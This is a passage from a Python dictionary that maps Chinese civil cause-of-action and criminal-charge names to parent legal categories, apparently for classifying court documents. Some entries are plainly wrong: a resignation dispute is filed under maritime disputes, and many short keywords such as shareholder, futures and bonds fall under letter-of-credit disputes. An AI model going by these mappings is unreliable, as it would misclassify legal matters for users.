u'证券纠纷',\r\n u'企业债权转股权合同纠纷': u'与企业有关的纠纷',\r\n u'垄断': u'垄断纠纷',\r\n u'赠与合同纠纷': u'合同纠纷',\r\n u'破坏计算机信息系统罪': u'妨害社会管理秩序罪',\r\n u'资助危害国家安全犯罪活动罪': u'危害国家安全罪',\r\n u'聚众哄抢罪': u'侵犯财产罪',\r\n u'建筑物区分所有权': u'所有权纠纷',\r\n u'保险代理合同纠纷': u'保险纠纷',\r\n u'物权确认纠纷': u'物权保护纠纷',\r\n u'劳务派遣合同纠纷': u'劳动争议',\r\n u'法律': u'合同纠纷',\r\n u'实用新型专利实施': u'知识产权合同纠纷',\r\n u'中外合作经营企业承包经营合同纠纷': u'与企业有关的纠纷',\r\n u'非法批准征收、征用、占用土地罪': u'渎职罪',\r\n u'仓单质权纠纷': u'担保物权纠纷',\r\n u'养殖': u'合同纠纷',\r\n u'管道运输': u'合同纠纷',\r\n u'企业借贷': u'合同纠纷',\r\n u'集成电路布图设计专有权权属侵权纠纷': u'知识产权权属侵权纠纷',\r\n u'海上通海水域运输船舶承包合同纠纷': u'海事海商纠纷',\r\n u'技术出口合同纠纷': u'知识产权合同纠纷',\r\n u'建设用地使用权出让合同纠纷': u'合同纠纷',\r\n u'强制穿戴宣扬恐怖主义、极端主义服饰、标志罪': u'危害公共安全罪',\r\n u'音像制品制作合同纠纷': u'知识产权合同纠纷',\r\n u'社会保障': u'劳动争议',\r\n u'行纪合同纠纷': u'合同纠纷',\r\n u'准备实施恐怖活动罪': u'危害公共安全罪',\r\n u'打击报复证人罪': u'妨害社会管理秩序罪',\r\n u'商品房销售': u'合同纠纷',\r\n u'诉讼仲裁人民调解代理合同纠纷': u'合同纠纷',\r\n u'紧急避险损害责任纠纷': u'侵权责任纠纷',\r\n u'物件损害责任纠纷': u'侵权责任纠纷',\r\n u'驻香港、澳门特别行政区军人执行职务侵权责任纠纷': u'侵权责任纠纷',\r\n u'拍卖合同纠纷': u'合同纠纷',\r\n u'作品发行': u'知识产权权属侵权纠纷',\r\n u'作品完整': u'知识产权权属侵权纠纷',\r\n u'编造并传播证券、期货交易虚假信息罪': u'破坏社会主义市场经济秩序罪',\r\n u'申请诉前停止侵害植物新品种权': u'申请诉前停止侵害知识产权案件',\r\n u'船舶拆解合同纠纷': u'海事海商纠纷',\r\n u'罚款': u'行政管理与行政行为',\r\n u'破坏监管秩序罪': u'妨害社会管理秩序罪',\r\n u'委托创作合同纠纷': u'知识产权合同纠纷',\r\n u'走私淫秽物品罪': u'破坏社会主义市场���济秩序罪',\r\n u'仲裁程序中': u'申请保全案件',\r\n u'凭样品买卖合同纠纷': u'合同纠纷',\r\n u'建设用地使用权纠纷': u'用益物权纠纷',\r\n u'侵害实用新型专利权': u'知识产权权属侵权纠纷',\r\n u'动植物检疫徇私舞弊罪': u'渎职罪',\r\n u'异议登记不当损害责任纠纷': u'不动产登记纠纷',\r\n u'汇票回单签发请求权纠纷': u'票据纠纷',\r\n u'水路旅客运输合同纠纷': u'合同纠纷',\r\n u'案外人执行异议之诉': u'执行异议之诉',\r\n u'占有': u'占有保护纠纷',\r\n u'项目转让': u'合同纠纷',\r\n u'擅自设立金融机构罪': u'破坏社会主义市场经济秩序罪',\r\n u'为境外窃取、剌探、收买、非法提供军事秘密罪': u'军人违反职责罪',\r\n u'雇佣': 
u'劳动争议',\r\n u'公证损害责任纠纷': u'侵权责任纠纷',\r\n u'船舶优先权催告': u'海事诉讼特别程序案件',\r\n u'限定': u'垄断纠纷',\r\n u'票据保证纠纷': u'票据纠纷',\r\n u'逃离部队罪': u'军人违反职责罪',\r\n u'收养关系纠纷': u'婚姻家庭纠纷',\r\n u'挪用特定款物罪': u'侵犯财产罪',\r\n u'破产债权确认纠纷': u'与破产有关的纠纷',\r\n u'建设用地使用权转让合同纠纷': u'合同纠纷',\r\n u'婚约财产纠纷': u'婚姻家庭纠纷',\r\n u'装卸作业': u'合同纠纷',\r\n u'商标专用权': u'知识产权权属侵权纠纷',\r\n u'房地产咨询': u'合同纠纷',\r\n u'产权交易': u'知识产权权属侵权纠纷',\r\n u'遗失物返还纠纷': u'所有权纠纷',\r\n u'职务技术成果完成人奖励报酬纠纷': u'知识产权合同纠纷',\r\n u'港口作业重大责任事故责任纠纷': u'海事海商纠纷',\r\n u'融资租赁': u'合同纠纷',\r\n u'演出合同': u'合同纠纷',\r\n u'伪造公司、企业、事业单位、人民团体印章罪': u'妨害社会管理秩序罪',\r\n u'侵害作品发表权纠纷': u'知识产权权属侵权纠纷',\r\n u'著作权转让合同': u'知识产权合同纠纷',\r\n u'发明专利权': u'知识产权权属侵权纠纷',\r\n u'娱乐': u'合同纠纷',\r\n u'故意损毁文物罪': u'妨害社会管理秩序罪',\r\n u'代销': u'证券纠纷',\r\n u'提供劳务者受害责任纠纷': u'侵权责任纠纷',\r\n u'民用航空运输销售代理合同纠纷': u'合同纠纷',\r\n u'战时造谣扰乱军心罪': u'危害国防利益罪',\r\n u'聘用': u'人事争议',\r\n u'证照': u'信用证纠纷',\r\n u'饲养': u'侵权责任纠纷',\r\n u'申请承认和执行外国法院民事判决、裁定': u'申请承认与执行法院判决、仲裁裁决案件',\r\n u'违规披露、不披露重要信息罪': u'破坏社会主义市场经济秩序罪',\r\n u'徇私舞弊不征、少征税款罪': u'渎职罪',\r\n u'土地承包经营权继承纠纷': u'用益物权纠纷',\r\n u'复函': u'行政管理与行政行为',\r\n u'国有公司、企业、事业单位人员滥用职权罪': u'破坏社会主义市场经济秩序罪',\r\n u'入伙': u'信用证纠纷',\r\n u'保险代位求偿': u'信用证纠纷',\r\n u'因申请诉中财产保全损害责任纠纷': u'侵权责任纠纷',\r\n u'供用热力合同纠纷': u'合同纠纷',\r\n u'破产抵销': u'与破产有关的纠纷',\r\n u'代位': u'信用证纠纷',\r\n u'非法采矿罪': u'妨害社会管理秩序罪',\r\n u'因申请知识产权临时措施': u'知识产权权属侵权纠纷',\r\n u'费用': u'合同纠纷',\r\n u'信用证融资纠纷': u'信用证纠纷',\r\n u'仓储合同': u'合同纠纷',\r\n u'海上': u'海事海商纠纷',\r\n u'确认不侵害著作权纠纷': u'知识产权权属侵权纠纷',\r\n u'基金': u'信用证纠纷',\r\n u'侵害外观设计专利权': u'知识产权权属侵权纠纷',\r\n u'产品质量损害': u'侵权责任纠纷',\r\n u'加工': u'合同纠纷',\r\n u'撤销工商变更': u'行政管理与行政行为',\r\n u'非全日制用工': u'劳动争议',\r\n u'土地承包经营': u'用益物权纠纷',\r\n u'骗取出口退税罪': u'破坏社会主义市场经济秩序罪',\r\n u'扰乱国家机关工作秩序罪': u'妨害社会管理秩序罪',\r\n u'垄断协议纠纷': u'垄断纠纷',\r\n u'证券上市保荐合同纠纷': u'证券纠纷',\r\n u'取水权': u'用益物权纠纷',\r\n u'寻衅滋事罪': u'妨害社会管理秩序罪',\r\n u'小额借款合同纠纷': u'合同纠纷',\r\n u'申请船舶优先权催告': u'海事诉讼特别程序案件',\r\n u'海上通海水域拖航合同纠纷': u'海事海商纠纷',\r\n u'异议登记': u'不动产登记纠纷',\r\n u'代位继承纠纷': u'继承纠纷',\r\n u'网络侵权责任纠纷': u'侵权责任纠纷',\r\n u'商品房委托代理': u'合同纠纷',\r\n u'介绍贿赂罪': u'贪污贿赂罪',\r\n u'盗伐林木罪': u'妨害社会管理秩序罪',\r\n u'财产保险合同纠纷': u'保险纠纷',\r\n u'技术秘密让与': u'知识产权合同纠纷',\r\n u'民间委托理财合同纠纷': u'合同纠纷',\r\n u'侵害患者知情同意权责任纠纷': u'侵权责任纠纷',\r\n u'保险人代位': u'保险纠纷',\r\n u'车位纠纷': u'所有权纠纷',\r\n u'案外人': u'执行异议之诉',\r\n u'损害股东利益': u'与公司有关的纠纷',\r\n u'破坏选举罪': u'侵犯公民人身权利、民主权利罪',\r\n u'公房': u'所有权纠纷',\r\n u'公司债券回购合同纠纷': u'证券纠纷',\r\n u'企业分立合同纠纷': u'与企业有关的纠纷',\r\n u'公司章程': u'信用证纠纷',\r\n u'预售': u'合同纠纷',\r\n u'集成电路布图设计专有权权属纠纷': u'知识产权权属侵权纠纷',\r\n u'增资': u'信用证纠纷',\r\n u'财产保险': u'信用证纠纷',\r\n u'加工合同纠纷': u'合同纠纷',\r\n u'签订、履行合同失职被骗罪': u'破坏社会主义市场经济秩序罪',\r\n u'诬告陷害罪': u'侵犯公民人身权利、民主权利罪',\r\n u'转质权纠纷': u'担保物权纠纷',\r\n u'国债回购合同纠纷': u'证券纠纷',\r\n u'组织越狱罪': u'妨害社会管理秩序罪',\r\n u'漂流物返还纠纷': u'所有权纠纷',\r\n u'证券认购': u'证券纠纷',\r\n u'期货保证合约': u'期货交易纠纷',\r\n u'专利代理合同': u'知识产权合同纠纷',\r\n u'婚姻自主权纠纷': u'人格权纠纷',\r\n u'申请宣告公民恢复完全民事行为能力': u'认定公民无民事行为能力、限制民事行为能力案件',\r\n u'生命': u'人格权纠纷',\r\n u'抵押合同': u'合同纠纷',\r\n u'船舶物料和备品供应合同纠纷': u'海事海商纠纷',\r\n u'申请海事支付令': u'海事诉讼特别程序案件',\r\n u'认定财产': u'认定财产无主案件',\r\n u'网络域名权属侵权纠纷': u'知识产权权属侵权纠纷',\r\n u'组织残疾人、儿童乞讨罪': u'侵犯公民人身权利、民主权利罪',\r\n u'商标使用许可合同纠纷': u'知识产权合同纠纷',\r\n u'船舶属具租赁合同纠纷': u'海事海商纠纷',\r\n u'保险经纪合同纠纷': u'保险纠纷',\r\n u'中外合作经营企业合同纠纷': u'与企业有关的纠纷',\r\n u'提供侵入、非法控制计算机信息系统程序、工具罪': u'妨害社会管理秩序罪',\r\n u'申请认可和执行澳门特别行政区法院民事判决': u'申请承认与执行法院判决、仲裁裁决案件',\r\n u'海上通海水域行李运输合同纠纷': u'海事海商纠纷',\r\n u'共有人': u'所有权纠纷',\r\n u'中外合资': u'与企业有关的纠纷',\r\n u'侵害作品复制权纠纷': u'知识产权权属侵权纠纷',\r\n u'辞职争议': u'海事海商纠纷',\r\n u'技术合同纠纷': u'知识产权合同纠纷',\r\n u'煽动颠覆国家政权罪': u'危害国家安全罪',\r\n u'债权人撤销权纠纷': u'合同纠纷',\r\n u'代为': u'信用证纠纷',\r\n u'国债': u'信用证纠纷',\r\n u'软件': 
u'知识产权权属侵权纠纷',\r\n    u'计算机软件著作权权属纠纷': u'知识产权权属侵权纠纷',\r\n    u'土地承包经营权出租合同纠纷': u'合同纠纷',\r\n    u'招投标': u'合同纠纷',\r\n    u'经营秘密': u'知识产权权属侵权纠纷',\r\n    u'铁路运输': u'侵权责任纠纷',\r\n    u'集体合同纠纷': u'劳动争议',\r\n    u'虐待罪': u'侵犯公民人身权利、民主权利罪',\r\n    u'承揽合同': u'合同纠纷',\r\n    u'承包地': u'用益物权纠纷',\r\n    u'擅自改变武器装备编配用途罪': u'军人违反职责罪',\r\n    u'医疗损害': u'侵权责任纠纷',\r\n    u'海运集装箱租赁合同纠纷': u'海事海商纠纷',\r\n    u'典当纠纷': u'合同纠纷',\r\n    u'试用买卖': u'合同纠纷',\r\n    u'再保险合同纠纷': u'保险纠纷',\r\n    u'网络服务': u'合同纠纷',\r\n    u'盗窃、侮辱、故意毁坏尸体、尸骨、骨灰罪': u'妨害社会管理秩序罪',\r\n    u'证券认购纠纷': u'证券纠纷',\r\n    u'走私废物罪': u'破坏社会主义市场经济秩序罪',\r\n    u'证券投资基金回购合同纠纷': u'证券纠纷',\r\n    u'电信': u'合同纠纷',\r\n    u'妨害公务罪': u'妨害社会管理秩序罪',\r\n    u'船舶改建合同纠纷': u'海事海商纠纷',\r\n    u'捆绑': u'垄断纠纷',\r\n    u'船舶租用合同纠纷': u'海事海商纠纷',\r\n    u'工伤保险': u'劳动争议',\r\n    u'植物新品种育种合同纠纷': u'知识产权合同纠纷',\r\n    u'串通投标罪': u'破坏社会主义市场经济秩序罪',\r\n    u'期货交易代理合同纠纷': u'期货交易纠纷',\r\n    u'委托合同纠纷': u'合同纠纷',\r\n    u'串通投标不正当竞争纠纷': u'不正当竞争纠纷',\r\n    u'养老': u'劳动争议',\r\n    u'运杂费': u'合同纠纷',\r\n    u'辞退争议': u'人事争议',\r\n    u'进出口代理合同纠纷': u'合同纠纷',\r\n    u'医疗保险': u'劳动争议',\r\n    u'申请海事强制令': u'海事诉讼特别程序案件',\r\n    u'商检徇私舞弊罪': u'渎职罪',\r\n    u'申请宣告公民限制民事行为能力': u'认定公民无民事行为能力、限制民事行为能力案件',\r\n    u'建筑物区分所有权纠纷': u'所有权纠纷',\r\n    u'遗嘱继承纠纷': u'继承纠纷',\r\n    u'医疗产品责任纠纷': u'侵权责任纠纷',\r\n    u'船舶属具': u'海事海商纠纷',\r\n    u'计算机软件': u'知识产权权属侵权纠纷',\r\n    u'发明创造': u'知识产权权属侵权纠纷',\r\n    u'著作权合同': u'知识产权合同纠纷',\r\n    u'教育培训合同纠纷': u'合同纠纷',\r\n    u'走私珍贵动物、珍贵动物制品罪': u'破坏社会主义市场经济秩序罪',\r\n    u'隐藏物': u'所有权纠纷',\r\n    u'假冒专利罪': u'破坏社会主义市场经济秩序罪',\r\n    u'非法购买增值税专用发票、购买伪造的增值税专用发票罪': u'破坏社会主义市场经济秩序罪',\r\n    u'应收账款质权纠纷': u'担保物权纠纷',\r\n    u'临时用地合同纠纷': u'合同纠纷',\r\n    u'确认合同无效纠纷': u'合同纠纷',\r\n    u'国际铁路': u'合同纠纷',\r\n    u'虚假登记': u'不动产登记纠纷',\r\n    u'联合运输合同纠纷': u'合同纠纷',\r\n    u'专利权转让': u'知识产权合同纠纷',\r\n    u'招标投标买卖合同纠纷': u'合同纠纷',\r\n    u'证券回购': u'证券纠纷',\r\n    u'发现权': u'知识产权权属侵权纠纷',\r\n    u'申请公示催告': u'公示催告程序案件',\r\n    u'非法买卖、运输、携带、持有毒品原植物种子、幼苗罪': u'妨害社会管理秩序罪',\r\n    u'国债权利确认纠纷': u'证券纠纷',\r\n    u'非法收购、运输盗伐、滥伐的林木罪': u'妨害社会管理秩序罪',\r\n    u'非法采伐、毁坏国家重点保护植物罪': u'妨害社会管理秩序罪',\r\n    u'海上通海水域财产损害责任纠纷': u'海事海商纠纷',\r\n    u'意外伤害保险合同纠纷': u'保险纠纷',\r\n    u'转继承纠纷': u'继承纠纷',\r\n    u'侵害外观设计专利权纠纷': u'知识产权权属侵权纠纷',\r\n    u'侵害实用新型专利权纠纷': u'知识产权权属侵权纠纷',\r\n    u'承销': u'证券纠纷',\r\n    u'分期付款买卖合同纠纷': u'合同纠纷',\r\n    u'逃避商检罪': u'破坏社会主义市场经济秩序罪',\r\n    u'物业服务合同纠纷': u'合同纠纷',\r\n    u'民事信托纠纷': u'信托纠纷',\r\n    u'申请执行涉外仲裁裁决': u'申请承认与执行法院判决、仲裁裁决案件',\r\n    u'管理人': u'信用证纠纷',\r\n    u'股东': u'信用证纠纷',\r\n    u'组织淫秽表演罪': u'妨害社会管理秩序罪',\r\n    u'商标': u'知识产权合同纠纷',\r\n    u'侵害作品信息网络传播权纠纷': u'知识产权权属侵权纠纷',\r\n    u'房屋买卖合同纠纷': u'合同纠纷',\r\n    u'票据回购纠纷': u'票据纠纷',\r\n    u'侵占期货交易保证金纠纷': u'期货交易纠纷',\r\n    u'保险人代位求偿权纠纷': u'保险纠纷',\r\n    u'证券回购合同纠纷': u'证券纠纷',\r\n    u'探矿权转让合同纠纷': u'合同纠纷',\r\n    u'劫夺被押解人员罪': u'妨害社会管理秩序罪',\r\n    u'发明专利实施': u'知识产权合同纠纷',\r\n    u'遗弃伤病军人罪': u'军人违反职责罪',\r\n    u'提供伪造、变造的出入境证件罪': u'妨害社会管理秩序罪',\r\n    u'网络域名注册合同纠纷': u'知识产权合同纠纷',\r\n    u'商业秘密': u'不正当竞争纠纷',\r\n    u'种植养殖回收合同纠纷': u'合同纠纷',\r\n    u'租金': u'合同纠纷',\r\n    u'资本': u'与公司有关的纠纷',\r\n    u'强迫卖淫罪': u'妨害社会管理秩序罪',\r\n    u'专利申请权权属纠纷': u'知识产权权属侵权纠纷',\r\n    u'抵押权': u'担保物权纠纷',\r\n    u'福利待遇': u'劳动争议',\r\n    u'过失致人重伤罪': u'侵犯公民人身权利、民主权利罪',\r\n    u'其他著作财产权': u'知识产权权属侵权纠纷',\r\n    u'广播组织权权属纠纷': u'知识产权权属侵权纠纷',\r\n    u'船舶碰撞损害责任纠纷': u'海事海商纠纷',\r\n    u'建筑设备租赁合同纠纷': u'合同纠纷',\r\n    u'申请破产和解': u'与破产有关的纠纷',\r\n    u'最高额质权纠纷': u'担保物权纠纷',\r\n    u'企业承包': u'与企业有关的纠纷',\r\n    u'储蓄': u'合同纠纷',\r\n    u'环保': u'侵权责任纠纷',\r\n    u'滥用职权罪': u'渎职罪',\r\n    u'探矿权': u'用益物权纠纷',\r\n    u'劫持航空器罪': u'危害公共安全罪',\r\n    u'组织、领导、参加黑社会性质组织罪': u'妨害社会管理秩序罪',\r\n    u'违法提供出口退税凭证罪': u'渎职罪',\r\n    u'定金合同纠纷': u'合同纠纷',\r\n    u'捆绑交易纠纷': u'垄断纠纷',\r\n    u'申请撤销宣告公民死亡': u'宣告失踪、宣告死亡案件',\r\n    u'证券权利确认纠纷': u'证券纠纷',\r\n    u'植物新品种权权属侵权纠纷': u'知识产权权属侵权纠纷',\r\n    u'决议': u'信用证纠纷',\r\n    u'生产、销售伪劣农药、兽药、化肥、种子罪': u'破坏社会主义市场经济秩序罪',\r\n    u'集成电路': u'知识产权权属侵权纠纷',\r\n    u'金融工作人员购买假币、以假币换取货币罪': 
u'破坏社会主义市场经济秩序罪',\r\n u'房屋租赁合同纠纷': u'合同纠纷',\r\n u'非法出售、私赠文物藏品罪': u'妨害社会管理秩序罪',\r\n u'人寿保险': u'保险纠纷',\r\n u'保全损害': u'侵权责任纠纷',\r\n u'期货透支': u'期货交易纠纷',\r\n u'委托开立': u'信用证纠纷',\r\n u'股权质权纠纷': u'担保物权纠纷',\r\n u'借记卡': u'合同纠纷',\r\n u'探矿权纠纷': u'用益物权纠纷',\r\n u'申请扣押船用燃油及船用物料': u'海事诉讼特别程序案件',\r\n u'污染': u'侵权责任纠纷',\r\n u'非法搜查罪': u'侵犯公民人身权利、民主权利罪',\r\n u'网络购物': u'合同纠纷',\r\n u'农村房屋买卖': u'合同纠纷',\r\n u'采矿权纠纷': u'用益物权纠纷',\r\n u'渔船承包合同纠纷': u'海事海商纠纷',\r\n u'债权让与': u'合同纠纷',\r\n u'因申请诉前证据保全损害责任纠纷': u'侵权责任纠纷',\r\n u'逃避追缴欠税罪': u'破坏社会主义市场经济秩序罪',\r\n u'金融衍生品': u'信用证纠纷',\r\n u'理货合同纠纷': u'海事海商纠纷',\r\n u'股东出资纠纷': u'与公司有关的纠纷',\r\n u'因恶意提起知识产权诉讼损害责任纠纷': u'知识产权权属侵权纠纷',\r\n u'金融借款合同纠纷': u'合同纠纷',\r\n u'证券发行': u'证券纠纷',\r\n u'公司债券交易纠纷': u'证券纠纷',\r\n u'庆典服务合同纠纷': u'合同纠纷',\r\n u'植物新品种申请权权属纠纷': u'知识产权权属侵权纠纷',\r\n u'相邻': u'所有权纠纷',\r\n u'执行判决、裁定失职罪': u'渎职罪',\r\n u'战时拒不救治伤病军人罪': u'军人违反职责罪',\r\n u'公司证照': u'与公司有关的纠纷',\r\n u'入境发展黑社会组织罪': u'妨害社会管理秩序罪',\r\n u'证券交易': u'证券纠纷',\r\n u'帮助恐怖活动罪': u'危害公共安全罪',\r\n u'道路': u'侵权责任纠纷',\r\n u'接送不合格兵员罪': u'危害国防利益罪',\r\n u'承包地征收补偿费用分配纠纷': u'用益物权纠纷',\r\n u'敲诈勒索罪': u'侵犯财产罪',\r\n u'发明权纠纷': u'知识产权权属侵权纠纷',\r\n u'伪造货币罪': u'破坏社会主义市场经济秩序罪',\r\n u'铁路机车车辆建造合同纠纷': u'合同纠纷',\r\n u'宅基地': u'用益物权纠纷',\r\n u'实用新型专利': u'知识产权权属侵权纠纷',\r\n u'侵犯著作权罪': u'破坏社会主义市场经济秩序罪',\r\n u'非法处置查封、扣押、冻结的财产罪': u'妨害社会管理秩序罪',\r\n u'商品房销售合同纠纷': u'合同纠纷',\r\n u'请求公司收购股份纠纷': u'与公司有关的纠纷',\r\n u'审查': u'行政管理与行政行为',\r\n u'妨害信用卡管理罪': u'破坏社会主义市场经济秩序罪',\r\n u'公司增资纠纷': u'与公司有关的纠纷',\r\n u'相邻损害防免关系纠纷': u'所有权纠纷',\r\n u'对外国公职人员、国际公共组织官员行贿罪': u'破坏社会主义市场经济秩序罪',\r\n u'教育设施重大安全事故罪': u'危害公共安全罪',\r\n u'票据交付请求权纠纷': u'票据纠纷',\r\n u'公司决议撤销纠纷': u'与公司有关的纠纷',\r\n u'计算机软件著作权许可使用合同纠纷': u'知识产权合同纠纷',\r\n u'编造、故意传播虚假信息罪': u'妨害社会管理秩序罪',\r\n u'借用合同纠纷': u'合同纠纷',\r\n u'船舶代理': u'海事海商纠纷',\r\n u'非法持有、私藏枪支、弹药罪': u'危害公共安全罪',\r\n u'战时拒绝、逃避服役罪': u'危害国防利益罪',\r\n u'猥亵儿童罪': u'侵犯公民人身权利、民主权利罪',\r\n u'水路': u'合同纠纷',\r\n u'债权人撤销': u'合同纠纷',\r\n u'股份': u'信用证纠纷',\r\n u'业主': u'所有权纠纷',\r\n u'过失爆炸罪': u'危害公共安全罪',\r\n u'泄露不应公开的案件信息罪': u'妨害社会管理秩序罪',\r\n u'同居关系子女抚养纠纷': u'婚姻家庭纠纷',\r\n u'伪造、变造国家有价证券罪': u'破坏社会主义市场经济秩序罪',\r\n u'人身保险': u'保险纠纷',\r\n u'同居关系纠纷': u'婚姻家庭纠纷',\r\n u'期货交易代理': u'期货交易纠纷',\r\n u'申请执行海事仲裁裁决': u'申请承认与执行法院判决、仲裁裁决案件',\r\n u'委托创作': u'知识产权合同纠纷',\r\n u'营业信托纠纷': u'信托纠纷',\r\n u'对单位行贿罪': u'贪污贿赂罪',\r\n u'知识产权质押': u'知识产权合同纠纷',\r\n u'骗购外汇罪': u'破坏社会主义市场经济秩序罪',\r\n u'婚姻无效纠纷': u'婚姻家庭纠纷',\r\n u'港口货物保管合同纠纷': u'海事海商纠纷',\r\n u'投诉': u'行政管理与行政行为',\r\n u'产品质量侵权': u'侵权责任纠纷',\r\n u'遗嘱继承': u'继承纠纷',\r\n u'过失损毁文物罪': u'妨害社会管理秩序罪',\r\n u'证券交易代理合同纠纷': u'证券纠纷',\r\n u'福利待遇纠纷': u'劳动争议',\r\n u'受贿罪': u'贪污贿赂罪',\r\n u'埋藏物': u'所有权纠纷',\r\n u'内幕交易、泄露内幕信息罪': u'破坏社会主义市场经济秩序罪',\r\n u'保险理赔': u'信用证纠纷',\r\n u'战时窝藏逃离部队军人罪': u'危害国防利益罪',\r\n u'广播电视播放合同纠纷': u'知识产权合同纠纷',\r\n u'装饰': u'合同纠纷',\r\n u'渔业承包': u'合同纠纷',\r\n u'确认合同有效纠纷': u'合同纠纷',\r\n u'铁路运营安全事故罪': u'危害公共安全罪',\r\n u'所有权确认': u'物权保护纠纷',\r\n u'侵害出版者权纠纷': u'知识产权权属侵权纠纷',\r\n u'测试': u'合同纠纷',\r\n u'项目转让合同纠纷': u'合同纠纷',\r\n u'侵害其他著作财产权纠纷': u'知识产权权属侵权纠纷',\r\n u'海上通海水域货运代理合同纠纷': u'海事海商纠纷',\r\n u'技术秘密': u'知识产权权属侵权纠纷',\r\n u'拒绝': u'垄断纠纷',\r\n u'公司设立': u'与公司有关的纠纷',\r\n u'代理合同': u'合同纠纷',\r\n u'侵害发明专利权纠纷': u'知识产权权属侵权纠纷',\r\n u'过失损坏广播电视设施、公用电信设施罪': u'危害公共安全罪',\r\n u'医疗服务合同纠纷': u'合同纠纷',\r\n u'融资融券交易纠纷': u'证券纠纷',\r\n u'房地产价格评估合同纠纷': u'合同纠纷',\r\n u'债权债务概括': u'合同纠纷',\r\n u'申请撤销认定财产无主': u'认定财产无主案件',\r\n u'商标权': u'知识产权权属侵权纠纷',\r\n u'货物运输': u'合同纠纷',\r\n u'相邻关系': u'所有权纠纷',\r\n u'期货虚假信息责任纠纷': u'期货交易纠纷',\r\n u'见义勇为人受害责任纠纷': u'侵权责任纠纷',\r\n u'基金份额质权纠纷': u'担保物权纠纷',\r\n u'知名商品': u'不正当竞争纠纷',\r\n u'损害公司利益责任纠纷': u'与公司有关的纠纷',\r\n u'传授犯罪方法罪': u'妨害社会管理秩序罪',\r\n u'健康': u'人格权纠纷',\r\n u'伪造、倒卖伪造的有价票证罪': 
u'破坏社会主义市场经济秩序罪',\r\n    u'光船租赁': u'海事海商纠纷',\r\n    u'组织、资助非法聚集罪': u'妨害社会管理秩序罪',\r\n    u'技术': u'知识产权权属侵权纠纷',\r\n    u'技术培训合同纠纷': u'知识产权合同纠纷',\r\n    u'加班工资': u'劳动争议',\r\n    u'互易纠纷': u'合同纠纷',\r\n    u'餐饮服务合同纠纷': u'合同纠纷',\r\n    u'商品特有名称': u'知识产权权属侵权纠纷',\r\n    u'担保物权确认': u'物权保护纠纷',\r\n    u'最高额抵押权纠纷': u'担保物权纠纷',\r\n    u'不当': u'合同纠纷',\r\n    u'遗赠纠纷': u'继承纠纷',\r\n    u'合作创作': u'知识产权合同纠纷',\r\n    u'申请撤销仲裁裁决': u'仲裁程序案件',\r\n    u'期货': u'信用证纠纷',\r\n    u'招收公务员、学生徇私舞弊罪': u'渎职罪',\r\n    u'骗取贷款、票据承兑、金融票证罪': u'破坏社会主义市场经济秩序罪',\r\n    u'经营秘密让与合同纠纷': u'知识产权合同纠纷',\r\n    u'走私国家禁止进出口的货物、物品罪': u'破坏社会主义市场经济秩序罪',\r\n    u'证券代销合同纠纷': u'证券纠纷',\r\n    u'申请撤销监护人资格': u'监护权特别程序案件',\r\n    u'生育保险待遇纠纷': u'劳动争议',\r\n    u'侵害保护作品完整权纠纷': u'知识产权权属侵权纠纷',\r\n    u'相邻用水排水纠纷': u'所有权纠纷',\r\n    u'物业': u'合同纠纷',\r\n    u'编造、故意传播虚假恐怖信息罪': u'妨害社会管理秩序罪',\r\n    u'票据诈骗罪': u'破坏社会主义市场经济秩序罪',\r\n    u'海域使用权纠纷': u'用益物权纠纷',\r\n    u'侵害': u'知识产权权属侵权纠纷',\r\n    u'进出口信用保险合同纠纷': u'保险纠纷',\r\n    u'养老保险待遇纠纷': u'劳动争议',\r\n    u'金融不良债权追偿纠纷': u'合同纠纷',\r\n    u'股票交易纠纷': u'证券纠纷',\r\n    u'私自开拆、隐匿、毁弃邮件、电报罪': u'侵犯公民人身权利、民主权利罪',\r\n    u'计算机域名': u'知识产权合同纠纷',\r\n    u'消除危险纠纷': u'物权保护纠纷',\r\n    u'假冒他人专利': u'知识产权权属侵权纠纷',\r\n    u'退伙纠纷': u'合伙企业纠纷',\r\n    u'婚姻自主权': u'人格权纠纷',\r\n    u'触电人身损害责任纠纷': u'侵权责任纠纷',\r\n    u'理货': u'海事海商纠纷',\r\n    u'遗失、抛弃高度危险物损害责任纠纷': u'侵权责任纠纷',\r\n    u'确认不侵害': u'知识产权权属侵权纠纷',\r\n    u'公司决议效力确认纠纷': u'与公司有关的纠纷',\r\n    u'竞业': u'劳动争议',\r\n    u'停止侵害': u'申请诉前停止侵害知识产权案件',\r\n    u'机动车交通事故责任纠纷': u'侵权责任纠纷',\r\n    u'债券回购': u'证券纠纷',\r\n    u'著作权合同纠纷': u'知识产权合同纠纷',\r\n    u'侮辱罪': u'侵犯公民人身权利、民主权利罪',\r\n    u'公共场所': u'侵权责任纠纷',\r\n    u'安全保障义务': u'侵权责任纠纷',\r\n    u'虚假登记损害责任纠纷': u'不动产登记纠纷',\r\n    u'营业信托': u'信托纠纷',\r\n    u'航次租船合同纠纷': u'海事海商纠纷',\r\n    u'集成电路布图设计合同纠纷': u'知识产权合同纠纷',\r\n    u'买卖': u'合同纠纷',\r\n    u'消除危险': u'物权保护纠纷',\r\n    u'返还原物纠纷': u'物权保护纠纷',\r\n    u'挪用资金罪': u'侵犯财产罪',\r\n    u'投降罪': u'军人违反职责罪',\r\n    u'假冒他人专利纠纷': u'知识产权权属侵权纠纷',\r\n    u'码头建造': u'海事海商纠纷',\r\n    u'业主共有权纠纷': u'所有权纠纷',\r\n    u'商品房预约': u'合同纠纷',\r\n    u'技术秘密许可使用合同纠纷': u'知识产权合同纠纷',\r\n    u'义务帮工': u'侵权责任纠纷',\r\n    u'人事': u'人事争议',\r\n    u'信用证议付纠纷': u'信用证纠纷',\r\n    u'发起人责任纠纷': u'与公司有关的纠纷',\r\n    u'财会服务合同纠纷': u'合同纠纷',\r\n    u'船舶抵押合同纠纷': u'海事海商纠纷',\r\n    u'凭样品买卖': u'合同纠纷',\r\n    u'非法制造、出售非法制造的用于骗取出口退税、抵扣税款发票罪': u'破坏社会主义市场经济秩序罪',\r\n    u'战时自伤罪': u'军人违反职责罪',\r\n    u'其他科技成果权纠纷': u'知识产权权属侵权纠纷',\r\n    u'差别待遇': u'垄断纠纷',\r\n    u'债权转让': u'合同纠纷',\r\n    u'经营者集中纠纷': u'垄断纠纷',\r\n    u'经济补偿金': u'劳动争议',\r\n    u'企业股份合作制改造合同纠纷': u'与企业有关的纠纷',\r\n    u'非法猎捕、杀害珍贵、濒危野生动物罪': u'妨害社会管理秩序罪',\r\n    u'服务合同纠纷': u'合同纠纷',\r\n    u'股票回购': u'证券纠纷',\r\n    u'特殊标志专有权': u'知识产权权属侵权纠纷',\r\n    u'申请撤销宣告失踪': u'宣告失踪、宣告死亡案件',\r\n    u'堆放物倒塌致害责任纠纷': 